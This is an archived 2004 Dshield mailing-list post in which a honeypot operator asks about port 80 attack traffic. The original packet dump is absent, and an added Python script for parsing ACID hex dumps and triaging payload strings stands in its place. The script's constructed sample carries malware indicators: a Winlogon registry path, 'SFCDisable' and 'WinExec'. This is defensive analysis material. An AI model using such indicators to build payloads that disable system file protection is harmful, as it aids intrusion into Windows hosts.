[Dshield] What is this Probing/Attacking port 80

Brian Jameson bjameson at cix.co.uk
Sat Jan 24 12:12:45 GMT 2004


I've seen this pattern probing/attacking port 80 on my honeypot on a few
occasions over the last couple of weeks but never 3 in such a short time
span from three widely spread IP addresses (Kenya, Philippines and Russia).
Does anyone know what it is? See dump from Acid below:-

regards,
Brian

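One way to triage the ACID dump the post asks about, as an added example that is not part of the original post: it rebuilds the raw bytes from ACID's hex-dump lines (hex offset, colon, up to 16 hex pairs, then an ASCII column), pulls out printable strings across line boundaries, and buckets them into paths, DLL names and identifiers, which is what exposes the registry keys and API names a payload like this carries. The dump lines in `SAMPLE` are constructed for this example and are not the real payload.

```python
import re
from typing import Dict, List

# One ACID-style dump line: "<hex offset> : <up to 16 hex pairs>" then an ASCII column.
# Only the hex column is used: the ASCII column is lossy ('.' for non-printables) and
# mailing-list archives mangle it further (e.g. '@' rewritten as ' at ').
LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*((?:[0-9A-Fa-f]{2} ){0,15}[0-9A-Fa-f]{2})")

def parse_acid_dump(text: str) -> bytes:
    """Rebuild the raw payload from an ACID hex dump, checking that offsets are contiguous."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header (" length = ..."), blank or non-dump lines
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"non-contiguous dump: expected 0x{len(out):x}, got 0x{offset:x}")
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)

def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII, joined across dump lines, like strings(1)."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def triage(strings: List[str]) -> Dict[str, List[str]]:
    """Bucket strings the way an analyst skims them: paths, DLL names, CamelCase identifiers."""
    groups: Dict[str, List[str]] = {"paths": [], "dlls": [], "identifiers": [], "other": []}
    for s in strings:
        if "\\" in s or "/" in s:
            groups["paths"].append(s)          # registry keys, file paths, web paths
        elif s.lower().endswith(".dll"):
            groups["dlls"].append(s)           # import table library names
        elif re.fullmatch(r"[A-Z][A-Za-z0-9]+", s):
            groups["identifiers"].append(s)    # API names, also registry value names
        else:
            groups["other"].append(s)
    return groups

# Constructed sample in the same layout as the post's dump (not the real payload).
SAMPLE = r"""
 length = 38
000 : 4E 54 5C 57 69 6E 6C 6F 67 6F 6E 00 53 46 43 44   NT\Winlogon.SFCD
010 : 69 73 61 62 6C 65 00 00 57 69 6E 45 78 65 63 00   isable..WinExec.
020 : FC FC FC 90 C3 00                                 ......
"""

if __name__ == "__main__":
    for bucket, items in triage(printable_strings(parse_acid_dump(SAMPLE))).items():
        print(f"{bucket}: {items}")
```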
